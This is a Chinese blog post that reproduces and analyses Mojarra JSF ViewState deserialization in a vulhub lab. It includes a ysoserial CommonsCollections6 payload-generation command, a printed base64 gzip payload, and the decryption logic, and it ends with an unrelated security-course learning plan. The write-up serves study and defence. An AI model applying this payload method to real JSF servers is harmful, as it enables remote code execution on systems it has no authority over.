Java安全之Mojarra JSF反序列化

最新推荐文章于 2025-03-14 16:10:36 发布

程序员小强_

最新推荐文章于 2025-03-14 16:10:36 发布

阅读量1.2k

点赞数 20

文章标签： java 安全开发语言

本文链接：https://blog.csdn.net/dzqxwzoe/article/details/139282349

版权

JavaServer Faces，新一代的Java Web应用技术标准，吸收了很多Java
Servlet以及其他的Web应用框架的特性。JSF为Web应用开发定义了一个事件驱动的、基于组件的模型。

其中常用的是Sun（现在的Oracle）发布的Mojarra和Apache发布的MyFaces

JavaServerFaces（JSF）概念在几年前就已经引入，现在主要在J2EE中使用

JSF 和类似的 Web 技术之间的区别在于 JSF 使用
ViewStates（除了会话）来存储视图的当前状态（例如，当前应该显示视图的哪些部分）。ViewState 可以存储在server或
上client。JSF ViewStates 通常作为隐藏字段自动嵌入到 HTML
表单中，名称为javax.faces.ViewState。如果提交表单，它们将被发送回服务器。（有点像.net中的viewstate）

如果 JSF ViewState 配置为位于client隐藏javax.faces.ViewState字段上，则包含一个至少经过 Base64
编码的序列化 Java 对象。

默认字段如下,其中javax.faces.ViewState的值为经过编码/加密处理的序列化对象

<input type="hidden" name="javax.faces.ViewState" id="j_id__v_0:javax.faces.ViewState:1" value="rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s" autocomplete="off" />

利用条件#

所有MyFaces版本1.1.7、1.2.8、2.0和更早版本，以及Mojarra 1.2.14、2.0.2

JSF2.2之前的规范要求实现加密机制，但不要求使用加密机制。

Mojarra：ViewState配置为驻留在client (javax.faces.STATE_SAVING_METHOD)

MyFaces: ViewState配置为驻留在client或 server

如果能获取到加密密钥，那么即便进行加密，依然可以利用，默认情况下，Mojarra 使用AES加密算法HMAC-SHA256验证 ViewState。

漏洞复现#

vulhub拉取镜像将代码copy出来

docker-compose up -d
docker cp 568e46fdd891:/usr/src /tmp

本地起tomcat搭建环境,vulhub用的jdk7u21链，建议本地搭的时候自己添加一个可利用的依赖

![](https://img-
blog.csdnimg.cn/img_convert/b43334340be6f9a59c4729c92e5ae382.png)

生成payload命令,记得url编码

java -jar ysoserial-for-woodpecker-0.5.2.jar -g CommonsCollections6 -a "raw_cmd:open -a Calculator" | gzip | base64

H4sIAL4abWMAA5WUTWjUQBTHX5Kuta3S7RZKQcQetdjEQw/VPWitFhe2VWyR4l6c7s7uppsvJ5NttoqgoAW99LC1iKA99GYVxIMieCgePIgFvSh6EUHwoKAnj/om2W2zftXmkEwy8/+99/5vMstfIOYy6JgiZaJ6XDfUY8QtjlH++Mjl+euPHvYrAL4zvQ0A5IOHQFwSru+3WUElDskWqZq1TdO2XHwaBs1yXYxLtFImhkfVcZ3mRohz1OKscvXuq5v7V3a9k0FOg4JLOCTSIrBmEKugHZ+cQnkSp0zicGgPp0ROGhKSPn5T8raN0Xs3iI56NU1mKiizPlYv3arEqwpIaWjOkyy3Gcbdm0aEFiK0GkKLILRxRiw3bzOTMoyMMQ9sEDPvWYLtqkNFols0FwHse7bweffMQpMMUga265EZl0NfZnOpeKwm+VcyUcmTU73f3vR335BFI7F9ot3J/y4G3zixeAQ4UZ7rGJTvV2XhaIteX3EWLoDiO+X6XhItVU96FtdNCuvX5rxMWWW7RFkk+uynH6Vz51cHZFAyENMHWQE97Mz8aRu16SOUF+3cKDFp404b40y3CskMLjlBGDHHKw5FTCKKGTKI64Z+1/BhSTX83OrE7bi7x6i7KnNoLVBeKxhFiagohN3pen3v+YvTa50ADi2oCbP0hIE7BAktjK9Lw1wXvy4NzCQfHA6k5WCpK+6dgaxbyJy1IXK36IFzf4OGRTS0JYB2/wKV0BTboVZPH+kZIkbWMwj2hUMT9Wl2DS6JQU8gbXcb+p+yOC1QlviwuPT94iw2TUpBLDgY/IZ8Rj1zkrIry/M726rvr9X9kX4/mPCPjjW/XXnadealAvIwtBo2yQ0Hf3UKWniRUbdoGznfqZ1VML0Vb/GgRN//CQ5kWPztBAAA

![](https://img-
blog.csdnimg.cn/img_convert/a1b538720f7af049761a226297c514a8.png)

漏洞分析#

Web.xml配置，p牛的环境中是没有加密的，加密的环境后面再说

<servlet>
  <servlet-name>Faces Servlet</servlet-name>
  <servlet-class>javax.faces.webapp.FacesServlet</servlet-class>
  <load-on-startup>1</load-on-startup>
</servlet>
<!-- Map these files with JSF -->
<servlet-mapping>
  <servlet-name>Faces Servlet</servlet-name>
  <url-pattern>/faces/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
  <servlet-name>Faces Servlet</servlet-name>
  <url-pattern>*.jsf</url-pattern>
</servlet-mapping>
<servlet-mapping>
  <servlet-name>Faces Servlet</servlet-name>
  <url-pattern>*.faces</url-pattern>
</servlet-mapping>
<servlet-mapping>
  <servlet-name>Faces Servlet</servlet-name>
  <url-pattern>*.xhtml</url-pattern>
</servlet-mapping>

定位到jsf-api-2.1.28.jar!/javax/faces/webapp/FacesServlet#service

debug, 跟进this.lifecycle.execute(context);

public void service(ServletRequest req, ServletResponse resp) throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest)req;
        HttpServletResponse response = (HttpServletResponse)resp;
        this.requestStart(request.getRequestURI());
        if (!this.isHttpMethodValid(request)) {
            response.sendError(400);
        } else {
           ......

            FacesContext context;
            if (!this.initFacesContextReleased) {
                context = FacesContext.getCurrentInstance();
                if (null != context) {
                    context.release();
                }

                this.initFacesContextReleased = true;
            }

            context = this.facesContextFactory.getFacesContext(this.servletConfig.getServletContext(), request, response, this.lifecycle);

            try {
                ResourceHandler handler = context.getApplication().getResourceHandler();
                if (handler.isResourceRequest(context)) {
                    handler.handleResourceRequest(context);
                } else {
                    this.lifecycle.execute(context);
                    this.lifecycle.render(context);
                }
            }

跟进this.phases[i].doPhase ,这里会有循环遍历多个Phase对象去调用doPhase方法

![](https://img-
blog.csdnimg.cn/img_convert/04b4dfe1b4f9a0ba1ec482e79568336b.png)

继续跟进到this.execute

    public void doPhase(FacesContext context, Lifecycle lifecycle, ListIterator<PhaseListener> listeners) {
        context.setCurrentPhaseId(this.getId());
        PhaseEvent event = null;
        if (listeners.hasNext()) {
            event = new PhaseEvent(context, this.getId(), lifecycle);
        }

        Timer timer = Timer.getInstance();
        if (timer != null) {
            timer.startTiming();
        }

        try {
            this.handleBeforePhase(context, listeners, event);
            if (!this.shouldSkip(context)) {
                this.execute(context);
            }

在execute方法逻辑内，先通过facesContext.getExternalContext().getRequestMap();拿到一个RequestMap其中的值为ExternalContextImpl对象，该对象中包含了上下文、request、response等整体信息。后续跟进viewHandler.restoreView(facesContext, viewId);

![](https://img-
blog.csdnimg.cn/img_convert/83630adde15d07deae5e44ee3d55b76e.png)

继续跟进getstate

![](https://img-
blog.csdnimg.cn/img_convert/c991d9b6c4bf51bccba40b085221047e.png)

下面是一处关键点，通过刚才我们提到的ExternalContextImpl，从中对应的requestParameterMap中的key取出我们传入的payload,默认情况下是javax.faces.Viewstate，之后该值作为形参带入doGetState方法内

![](https://img-
blog.csdnimg.cn/img_convert/81f6dfd253aadde8aa69e84107a2e9db.png)

下面是漏洞出发点的反序列化逻辑部分

先Base64解码，解码后通过this.guard的值是否为null判断是否有加密，有加密的话会去调用this.guard.decrypt进行解密，之后ungzip解压

![](https://img-
blog.csdnimg.cn/img_convert/adad139923ffbfddbab58fdd35f4c649.png)

之后将该流转换为ApplicationObjectInputStream并有一个timeout的判断逻辑，后直接反序列化

![](https://img-
blog.csdnimg.cn/img_convert/f5a2acc6da254cc26857d550c79de3ed.png)

存在加密的情况的话可能会有以下的配置

  <context-param>
    <param-name>javax.faces.STATE_SAVING_METHOD</param-name>
    <param-value>client</param-value>
  </context-param>

  <env-entry> 
    <env-entry-name>com.sun.faces.ClientStateSavingPassword</env-entry-name> 
    <env-entry-type>java.lang.String</env-entry-type> 
    <env-entry-value>[some secret password]</env-entry-value>
  </env-entry>

或

<context-param>
  <param-name>com.sun.faces.ClientSideSecretKey</param-name>
  <param-value>[some secret password]</param-value>
</context-param>

在ClientSideStateHelper#doGetState中有如下代码

其中guard来标识是否启用加密，有加密时会调用this.guard.decrypt进行解密

if ("stateless".equals(stateString)) {
  return null;
} else {
  ObjectInputStream ois = null;
  InputStream bis = new Base64InputStream(stateString);

  try {
    if (this.guard != null) {
      byte[] bytes = stateString.getBytes("UTF-8");
      int numRead = ((InputStream)bis).read(bytes, , bytes.length);
      byte[] decodedBytes = new byte[numRead];
      ((InputStream)bis).reset();
      ((InputStream)bis).read(decodedBytes, , decodedBytes.length);
      bytes = this.guard.decrypt(decodedBytes);
      if (bytes == null) {
        return null;
      }

      bis = new ByteArrayInputStream(bytes);
    }

加解密逻辑均在ByteArrayGuard类中，需要时扣代码即可

public byte[] decrypt(byte[] bytes) {
  try {
    byte[] macBytes = new byte[32];
    System.arraycopy(bytes, , macBytes, , macBytes.length);
    byte[] iv = new byte[16];
    System.arraycopy(bytes, macBytes.length, iv, , iv.length);
    byte[] encdata = new byte[bytes.length - macBytes.length - iv.length];
    System.arraycopy(bytes, macBytes.length + iv.length, encdata, , encdata.length);
    IvParameterSpec ivspec = new IvParameterSpec(iv);
    Cipher decryptCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
    decryptCipher.init(2, this.sk, ivspec);
    Mac decryptMac = Mac.getInstance("HmacSHA256");
    decryptMac.init(this.sk);
    decryptMac.update(iv);
    decryptMac.update(encdata);
    byte[] macBytesCalculated = decryptMac.doFinal();
    if (this.areArrayEqualsConstantTime(macBytes, macBytesCalculated)) {
      byte[] plaindata = decryptCipher.doFinal(encdata);
      return plaindata;
    } else {
      System.err.println("ERROR: MAC did not verify!");
      return null;
    }
  } catch (Exception var10) {
    System.err.println("ERROR: Decrypting:" + var10.getCause());
    return null;
  }
}

整体逻辑为,其中看lib版本和配置来判断走不走加解密

 * Generate Payload:
 *          writeObject ==> Gzip ==> Encrpt ==> Base64Encode
 *
 * Recive Payload:
 *          Base64Decode ==> Decrpt ==> UnGzip ==> readObject

接下来我将给各位同学划分一张学习计划表！

学习计划

那么问题又来了，作为萌新小白，我应该先学什么，再学什么？
既然你都问的这么直白了，我就告诉你，零基础应该从什么开始学起：

阶段一：初级网络安全工程师

接下来我将给大家安排一个为期1个月的网络安全初级计划，当你学完后，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web渗透、安全服务、安全分析等岗位；其中，如果你等保模块学的好，还可以从事等保工程师。

综合薪资区间6k~15k

1、网络安全理论知识（2天）
①了解行业相关背景，前景，确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）

2、渗透测试基础（1周）
①渗透测试的流程、分类、标准
②信息收集技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础（1周）
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固基础）

4、计算机网络基础（1周）
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作（2天）
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透（1周）
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）

那么，到此为止，已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗？

阶段二：中级or高级网络安全工程师（看自己能力）

综合薪资区间15k~30k

7、脚本编程学习（4周）
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中，想要高效地使用自制的脚本工具来实现各种目的，更是需要拥有编程能力。

零基础入门的同学，我建议选择脚本语言Python/PHP/Go/Java中的一种，对常用库进行编程学习
搭建开发环境和选择IDE，PHP环境推荐Wamp和XAMPP，IDE强烈推荐Sublime；

Python编程学习，学习内容包含：语法、正则、文件、网络、多线程等常用库，推荐《Python核心编程》，没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构，并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。